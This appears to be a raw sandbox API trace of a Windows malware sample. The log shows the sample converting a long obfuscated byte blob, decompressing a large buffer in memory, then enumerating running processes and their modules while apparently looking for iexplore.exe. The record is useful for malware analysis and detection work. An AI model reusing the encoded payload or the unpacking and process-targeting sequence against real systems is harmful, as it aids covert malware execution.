\x45\x7e\x1f\x70\x74\x06\x03\x46\x70\x18\x7f\x2d\x19\x62\x0f\x71\xdd\x14\x79\x7f\x03\x2f\x48\x7d\x5f\x8d\x54\x4c\x52\xcf\x29\x24\x4b\x21\x36\x25\x3a\x21\x2c\x25\x78\x3c\x12\x42\x0b\x50\xcc\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\x0d\x52\xcc\x7d\x34\x69\x30\x0b\x35\x76\x31\x7a\x35\x6c\x31\x78\x30\x12\x42\xcb\x6b\x37\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\xcd\x69\x37\x7d\x34\x49\x36\x2b\x30\x56\x34\x5a\x30\x4c\x34\x58\x35\xd2\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\x32\x4a\xca\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\x4c\x34\xb8\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\xd2\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\xac\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\xb6\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\xba\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\xbd\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\xb6\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\xcc\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\xcb\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\xce\x46\x32\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\xa9\x2b\x35\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x22\x4b\x30\x46\x32\x32\x43\x2d\x48\xe5\x201d\x6b\xc7\x78\x67\x24\x33\x42\x30\xe8\xaf\xb4\x2018\x3b\x5d\x7e\x2022\x21\xe9\x47\x0c\x2d\xf1\x44\xf6\x41\x8d\x21\x201c\x2b\x33\xe7\xde\x2022\x3b\x32\x5b\xe9\x47\x57\x19\x32\x90\x30\x27\x4d\x2022\x46\x31\xe9\x10\xe4\x43\x66\xee\xe6\x46\x2f\x26\x34\x58\x6a\x178\xf4\x43\xe2\x2019\x2d\xd6\x46\x4c\xfe\x152\x39\x25\x09\x1a\xf5\x41\x78\x30\x58\x17\x34\x3f\xbe\xd5\x45\x2018\x21\xd1\x2c6\x201d\x5f\x0f\x6b\x7c\x90\x5f\x75\x31\x2f\x69\x2d\x4c") returned 0x22108 [0195.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\xd2\x2021\x45\x7c\x09\xa5\x47\x37\x2d\x46\x34\xd6\x37\x2d\x64\xce\xa6\x33\x2d\xfa\x34\x71\x1e\x2c\x5b\x75\x53\x0a\x4f\x03\xf2\x30\x26\x3a\x2b\x31\xf3\x3b\x45\x2026\x5a\xf8\x66\x152\x2d\x47\x78\x2122\x12\x79\x3c\x58\x2a\x33\x0d\x32\x46\x26\x54\x5f\x2a\x58\x57\x12\x35\x52\x2c\x5e\x39\x40\x14\x31\x2b\x50\x65\x43\x26\x5b\x67\x5d\x2d\x28\x14\x10\x7c\x7e\x74\x5c\x36\xb3\x49\x27\x1a\x44\x3e\x27\x6f\x31\xe7\x32\x178\xd2\x45\xeb\xdb\xb4\x5d\xb9\x08\x30\x46\x160\xf5\x51\xcf\xb8\x2d\x49\x66\x6c\x5a\x4e\x3c\x30\x4a\x37\x0b\x44\x32\x19\x76\x2d\x4b\x35\x1b\x33\x55\x33\x72\xf7\x52\x18\x62\x34\x5d\xd5\x45\x3e\x52\x3e\xe7\x35\x2b\x46\x34\x201e\x33\xe4\x44\x32\x4c\xdf\x49\x51\x34\x4e\x32\x26\xab\x34\x160\x32\x203a\x32\x49\xef\x56\x37\x35\xd6\x48\x24\x44\x36\x51\x1c\x77\xb4\x29\xc6\x3f\xb4\x17d\xc0\x50\x31\x5b\x31\x25\x42\x32\x49\x32\x11\x4b\x35\xd2\x31\xd4\x37\xc0\x3c\x57\x36\xd0\xe6\x41\x36\x45\x0d\x52\x31\x67\x30\x2d\x2e\xe2\x5e\x32\x29\xef\x30\x79\x33\x17\x72\x35\x68\x33\x1a\x4f\x55\x56\xa5\x73\x1d\x36\x55\x2e\x40\x4d\x31\x46\x2122\x8f\xb1\x0d\xb5\x52\xbd\x58\xc3\x2e\x74\x33\x2d\x54\x51\x77\x57\x4c\x36\x55\x34\x32\x25\x79\x35\x55\xb0\x2b\x32\x44\xbb\x57\xb4\xb2\xf1\xa9\x1b\x37\x42\x21\x56\x47\x3f\xaf\x27\xf4\x66\x3e\xac\x6f\x31\x2022\x38\xed\x4b\x74\xd7\x28\xb5\x4f\x60\x4f\xf2\x5f\x5f\x2dc\x6b\x1c\x16\x37\xf1\x48\xb0\x45\x7e\x1f\x70\x74\x06\x03\x46\x70\x18\x7f\x2d\x19\x62\x0f\x71\xdd\x14\x79\x7f\x03\x2f\x48\x7d\x5f\x8d\x54\x4c\x52\xcf\x29\x24\x4b\x21\x36\x25\x3a\x21\x2c\x25\x78\x3c\x12\x42\x0b\x50\xcc\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\x0d\x52\xcc\x7d\x34\x69\x30\x0b\x35\x76\x31\x7a\x35\x6c\x31\x78\x30\x12\x42\xcb\x6b\x37\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\xcd\x69\x37\x7d\x34\x49\x36\x2b\x30\x56\x34\x5a\x30\x4c\x34\x58\x35\xd2\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\x32\x4a\xca\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\x4c\x34\xb8\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\xd2\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\xac\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\xb6\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\xba\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\xbd\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\xb6\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\xcc\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\xcb\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\xce\x46\x32\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\xa9\x2b\x35\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x22\x4b\x30\x46\x32\x32\x43\x2d\x48\xe5\x201d\x6b\xc7\x78\x67\x24\x33\x42\x30\xe8\xaf\xb4\x2018\x3b\x5d\x7e\x2022\x21\xe9\x47\x0c\x2d\xf1\x44\xf6\x41\x8d\x21\x201c\x2b\x33\xe7\xde\x2022\x3b\x32\x5b\xe9\x47\x57\x19\x32\x90\x30\x27\x4d\x2022\x46\x31\xe9\x10\xe4\x43\x66\xee\xe6\x46\x2f\x26\x34\x58\x6a\x178\xf4\x43\xe2\x2019\x2d\xd6\x46\x4c\xfe\x152\x39\x25\x09\x1a\xf5\x41\x78\x30\x58\x17\x34\x3f\xbe\xd5\x45\x2018\x21\xd1\x2c6\x201d\x5f\x0f\x6b\x7c\x90\x5f\x75\x31\x2f\x69\x2d\x4c", cchWideChar=139529, lpMultiByteStr=0x62843c, cbMultiByte=139529, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\xd2\x87\x45\x7c\x09\xa5\x47\x37\x2d\x46\x34\xd6\x37\x2d\x64\xce\xa6\x33\x2d\xfa\x34\x71\x1e\x2c\x5b\x75\x53\x0a\x4f\x03\xf2\x30\x26\x3a\x2b\x31\xf3\x3b\x45\x85\x5a\xf8\x66\x8c\x2d\x47\x78\x99\x12\x79\x3c\x58\x2a\x33\x0d\x32\x46\x26\x54\x5f\x2a\x58\x57\x12\x35\x52\x2c\x5e\x39\x40\x14\x31\x2b\x50\x65\x43\x26\x5b\x67\x5d\x2d\x28\x14\x10\x7c\x7e\x74\x5c\x36\xb3\x49\x27\x1a\x44\x3e\x27\x6f\x31\xe7\x32\x9f\xd2\x45\xeb\xdb\xb4\x5d\xb9\x08\x30\x46\x8a\xf5\x51\xcf\xb8\x2d\x49\x66\x6c\x5a\x4e\x3c\x30\x4a\x37\x0b\x44\x32\x19\x76\x2d\x4b\x35\x1b\x33\x55\x33\x72\xf7\x52\x18\x62\x34\x5d\xd5\x45\x3e\x52\x3e\xe7\x35\x2b\x46\x34\x84\x33\xe4\x44\x32\x4c\xdf\x49\x51\x34\x4e\x32\x26\xab\x34\x8a\x32\x9b\x32\x49\xef\x56\x37\x35\xd6\x48\x24\x44\x36\x51\x1c\x77\xb4\x29\xc6\x3f\xb4\x8e\xc0\x50\x31\x5b\x31\x25\x42\x32\x49\x32\x11\x4b\x35\xd2\x31\xd4\x37\xc0\x3c\x57\x36\xd0\xe6\x41\x36\x45\x0d\x52\x31\x67\x30\x2d\x2e\xe2\x5e\x32\x29\xef\x30\x79\x33\x17\x72\x35\x68\x33\x1a\x4f\x55\x56\xa5\x73\x1d\x36\x55\x2e\x40\x4d\x31\x46\x99\x8f\xb1\x0d\xb5\x52\xbd\x58\xc3\x2e\x74\x33\x2d\x54\x51\x77\x57\x4c\x36\x55\x34\x32\x25\x79\x35\x55\xb0\x2b\x32\x44\xbb\x57\xb4\xb2\xf1\xa9\x1b\x37\x42\x21\x56\x47\x3f\xaf\x27\xf4\x66\x3e\xac\x6f\x31\x95\x38\xed\x4b\x74\xd7\x28\xb5\x4f\x60\x4f\xf2\x5f\x5f\x98\x6b\x1c\x16\x37\xf1\x48\xb0\x45\x7e\x1f\x70\x74\x06\x03\x46\x70\x18\x7f\x2d\x19\x62\x0f\x71\xdd\x14\x79\x7f\x03\x2f\x48\x7d\x5f\x8d\x54\x4c\x52\xcf\x29\x24\x4b\x21\x36\x25\x3a\x21\x2c\x25\x78\x3c\x12\x42\x0b\x50\xcc\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\x0d\x52\xcc\x7d\x34\x69\x30\x0b\x35\x76\x31\x7a\x35\x6c\x31\x78\x30\x12\x42\xcb\x6b\x37\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\xcd\x69\x37\x7d\x34\x49\x36\x2b\x30\x56\x34\x5a\x30\x4c\x34\x58\x35\xd2\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\x32\x4a\xca\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\x4c\x34\xb8\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\xd2\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\xac\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\xb6\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\xba\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\xbd\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\xb6\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\xcc\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\xcb\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\xce\x46\x32\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\xa9\x2b\x35\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x22\x4b\x30\x46\x32\x32\x43\x2d\x48\xe5\x94\x6b\xc7\x78\x67\x24\x33\x42\x30\xe8\xaf\xb4\x91\x3b\x5d\x7e\x95\x21\xe9\x47\x0c\x2d\xf1\x44\xf6\x41\x8d\x21\x93\x2b\x33\xe7\xde\x95\x3b\x32\x5b\xe9\x47\x57\x19\x32\x90\x30\x27\x4d\x95\x46\x31\xe9\x10\xe4\x43\x66\xee\xe6\x46\x2f\x26\x34\x58\x6a\x9f\xf4\x43\xe2\x92\x2d\xd6\x46\x4c\xfe\x8c\x39\x25\x09\x1a\xf5\x41\x78\x30\x58\x17\x34\x3f\xbe\xd5\x45\x91\x21\xd1\x88\x94\x5f\x0f\x6b\x7c\x90\x5f\x75\x31\x2f\x69\x2d\x4c", lpUsedDefaultChar=0x0) returned 139529 [0195.058] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x18f974 | out: ppsaOut=0x18f974) returned 0x0 [0195.058] SafeArrayDestroyDescriptor (psa=0x5e30a0) returned 0x0 [0195.060] GetUserDefaultLCID () returned 0x409 [0195.060] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f898, cchData=6 | out: lpLCData="1252") returned 5 [0195.061] SysStringLen (param_1="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x24 [0195.061] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0195.061] SysStringLen (param_1="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x24 [0195.061] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", cchWideChar=37, lpMultiByteStr=0x5e318c, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", lpUsedDefaultChar=0x0) returned 37 [0195.061] CallWindowProcA (lpPrevWndFunc=0x5deff0, hWnd=0x5e41e8, Msg=0x22108, wParam=0x5e318c, lParam=0x24) returned 0x5deff0 [0195.061] GetLastError () returned 0x578 [0195.061] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x18f8fc | out: ppsaOut=0x18f8fc) returned 0x0 [0195.070] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8e0 | out: ppsaOut=0x18f8e0) returned 0x0 [0195.070] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5e0ad4, Msg=0xfd46a728, wParam=0x0, lParam=0x0) returned 0x77edfded [0195.071] LoadLibraryW (lpLibFileName="ntdll") returned 0x77e20000 [0195.071] GetLastError () returned 0x578 [0195.071] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0195.071] SafeArrayDestroyDescriptor (psa=0x5e3168) returned 0x0 [0195.071] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0195.071] SafeArrayDestroyDescriptor (psa=0x5e3168) returned 0x0 [0195.071] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0195.071] SafeArrayDestroyDescriptor (psa=0x5e3168) returned 0x0 [0195.071] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0195.071] SafeArrayDestroyDescriptor (psa=0x5e3168) returned 0x0 [0195.071] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0195.071] SafeArrayDestroyDescriptor (psa=0x5e3168) returned 0x0 [0195.071] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0195.072] SafeArrayDestroyDescriptor (psa=0x5e3168) returned 0x0 [0195.072] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0195.072] SafeArrayDestroyDescriptor (psa=0x5e3168) returned 0x0 [0195.072] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.204] RtlDecompressBuffer (in: CompressionFormat=0x2, UncompressedBuffer=0x38d0020, UncompressedBufferSize=0x1a9cd8, CompressedBuffer=0x5e41e8, CompressedBufferSize=0x22107, FinalUncompressedSize=0x18f8f8 | out: UncompressedBuffer=0x38d0020, FinalUncompressedSize=0x18f8f8) returned 0x0 [0195.252] GetLastError () returned 0x578 [0195.252] SafeArrayDestroyDescriptor (psa=0x5e30d0) returned 0x0 [0195.252] SafeArrayRedim (in: psa=0x5e30a0, psaboundNew=0x18f84c | out: psa=0x5e30a0) returned 0x0 [0195.259] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0195.259] SafeArrayCopy (in: psa=0x5e30a0, ppsaOut=0x18fa40 | out: ppsaOut=0x18fa40) returned 0x0 [0195.265] SafeArrayDestroyDescriptor (psa=0x5e30a0) returned 0x0 [0195.265] CharUpperBuffW (in: lpsz="iexplore.exe", cchLength=0xd | out: lpsz="IEXPLORE.EXE") returned 0xd [0195.265] SafeArrayAllocDescriptorEx (in: vt=0x3, cDims=0x1, ppsaOut=0x18f8f4 | out: ppsaOut=0x18f8f4) returned 0x0 [0195.266] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.266] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75f90000 [0195.376] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.376] GetProcAddress (hModule=0x75f90000, lpProcName="EnumProcesses") returned 0x75f91544 [0195.376] EnumProcesses (in: lpidProcess=0x68e778, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lpidProcess=0x68e778, lpcbNeeded=0x18f8e8) returned 1 [0195.377] GetLastError () returned 0x0 [0195.377] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.377] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0195.378] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.378] GetProcAddress (hModule=0x76220000, lpProcName="OpenProcess") returned 0x76231986 [0195.378] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0195.378] GetLastError () returned 0x57 [0195.378] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.378] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0195.378] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.378] GetProcAddress (hModule=0x76220000, lpProcName="CloseHandle") returned 0x76231410 [0195.379] CloseHandle (hObject=0x0) returned 0 [0195.379] GetLastError () returned 0x6 [0195.379] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0195.379] GetLastError () returned 0x5 [0195.379] CloseHandle (hObject=0x0) returned 0 [0195.379] GetLastError () returned 0x6 [0195.379] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0195.379] GetLastError () returned 0x5 [0195.379] CloseHandle (hObject=0x0) returned 0 [0195.379] GetLastError () returned 0x6 [0195.379] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0195.379] GetLastError () returned 0x5 [0195.379] CloseHandle (hObject=0x0) returned 0 [0195.379] GetLastError () returned 0x6 [0195.379] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0195.379] GetLastError () returned 0x5 [0195.379] CloseHandle (hObject=0x0) returned 0 [0195.380] GetLastError () returned 0x6 [0195.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0195.380] GetLastError () returned 0x5 [0195.380] CloseHandle (hObject=0x0) returned 0 [0195.380] GetLastError () returned 0x6 [0195.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0195.380] GetLastError () returned 0x5 [0195.380] CloseHandle (hObject=0x0) returned 0 [0195.380] GetLastError () returned 0x6 [0195.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0195.380] GetLastError () returned 0x5 [0195.380] CloseHandle (hObject=0x0) returned 0 [0195.380] GetLastError () returned 0x6 [0195.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0195.380] GetLastError () returned 0x5 [0195.380] CloseHandle (hObject=0x0) returned 0 [0195.381] GetLastError () returned 0x6 [0195.381] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0195.381] GetLastError () returned 0x5 [0195.381] CloseHandle (hObject=0x0) returned 0 [0195.381] GetLastError () returned 0x6 [0195.381] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0195.381] GetLastError () returned 0x5 [0195.381] CloseHandle (hObject=0x0) returned 0 [0195.381] GetLastError () returned 0x6 [0195.381] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x29c) returned 0x0 [0195.381] GetLastError () returned 0x5 [0195.381] CloseHandle (hObject=0x0) returned 0 [0195.381] GetLastError () returned 0x6 [0195.381] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0195.381] GetLastError () returned 0x5 [0195.381] CloseHandle (hObject=0x0) returned 0 [0195.381] GetLastError () returned 0x6 [0195.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0195.382] GetLastError () returned 0x5 [0195.382] CloseHandle (hObject=0x0) returned 0 [0195.382] GetLastError () returned 0x6 [0195.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0195.382] GetLastError () returned 0x5 [0195.382] CloseHandle (hObject=0x0) returned 0 [0195.382] GetLastError () returned 0x6 [0195.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0195.382] GetLastError () returned 0x5 [0195.382] CloseHandle (hObject=0x0) returned 0 [0195.382] GetLastError () returned 0x6 [0195.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0195.382] GetLastError () returned 0x5 [0195.382] CloseHandle (hObject=0x0) returned 0 [0195.382] GetLastError () returned 0x6 [0195.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x39c) returned 0xfc [0195.383] GetLastError () returned 0x6 [0195.383] SafeArrayAllocDescriptorEx (in: vt=0x3, cDims=0x1, ppsaOut=0x18f8f0 | out: ppsaOut=0x18f8f0) returned 0x0 [0195.383] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.383] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75f90000 [0195.383] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.383] GetProcAddress (hModule=0x75f90000, lpProcName="EnumProcessModules") returned 0x75f91408 [0195.383] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 0 [0195.383] GetLastError () returned 0x12b [0195.383] CloseHandle (hObject=0xfc) returned 1 [0195.384] GetLastError () returned 0x12b [0195.384] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x110) returned 0xfc [0195.384] GetLastError () returned 0x12b [0195.384] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 0 [0195.384] GetLastError () returned 0x12b [0195.384] CloseHandle (hObject=0xfc) returned 1 [0195.384] GetLastError () returned 0x12b [0195.384] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x440) returned 0x0 [0195.384] GetLastError () returned 0x5 [0195.384] CloseHandle (hObject=0x0) returned 0 [0195.384] GetLastError () returned 0x6 [0195.384] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x0 [0195.384] GetLastError () returned 0x5 [0195.384] CloseHandle (hObject=0x0) returned 0 [0195.385] GetLastError () returned 0x6 [0195.385] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0xfc [0195.385] GetLastError () returned 0x6 [0195.385] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 0 [0195.385] GetLastError () returned 0x12b [0195.385] CloseHandle (hObject=0xfc) returned 1 [0195.385] GetLastError () returned 0x12b [0195.385] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x0 [0195.385] GetLastError () returned 0x5 [0195.385] CloseHandle (hObject=0x0) returned 0 [0195.385] GetLastError () returned 0x6 [0195.385] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x548) returned 0xfc [0195.385] GetLastError () returned 0x6 [0195.386] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 0 [0195.386] GetLastError () returned 0x12b [0195.386] CloseHandle (hObject=0xfc) returned 1 [0195.386] GetLastError () returned 0x12b [0195.386] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a0) returned 0x0 [0195.386] GetLastError () returned 0x5 [0195.386] CloseHandle (hObject=0x0) returned 0 [0195.386] GetLastError () returned 0x6 [0195.386] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x624) returned 0x0 [0195.386] GetLastError () returned 0x5 [0195.386] CloseHandle (hObject=0x0) returned 0 [0195.386] GetLastError () returned 0x6 [0195.386] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x730) returned 0xfc [0195.387] GetLastError () returned 0x6 [0195.387] EnumProcessModules (in: hProcess=0xfc, lphModule=0x68f780, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68f780, lpcbNeeded=0x18f8e8) returned 1 [0195.388] GetLastError () returned 0x0 [0195.388] SysStringLen (param_1="") returned 0x104 [0195.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=260, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 260 [0195.388] SysStringLen (param_1="") returned 0x104 [0195.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=261, lpMultiByteStr=0x5e321c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 261 [0195.388] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.388] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75f90000 [0195.389] SetErrorMode (uMode=0x8001) returned 0x8001 [0195.389] GetProcAddress (hModule=0x75f90000, lpProcName="GetModuleBaseNameA") returned 0x75f915a4 [0195.389] GetModuleBaseNameA (in: hProcess=0xfc, hModule=0x850000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="easily.exe") returned 0xa [0195.389] GetLastError () returned 0x0 [0195.389] SysStringByteLen (bstr="慥楳祬攮數") returned 0x104 [0195.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0195.389] SysStringByteLen (bstr="慥楳祬攮數") returned 0x104 [0195.389] 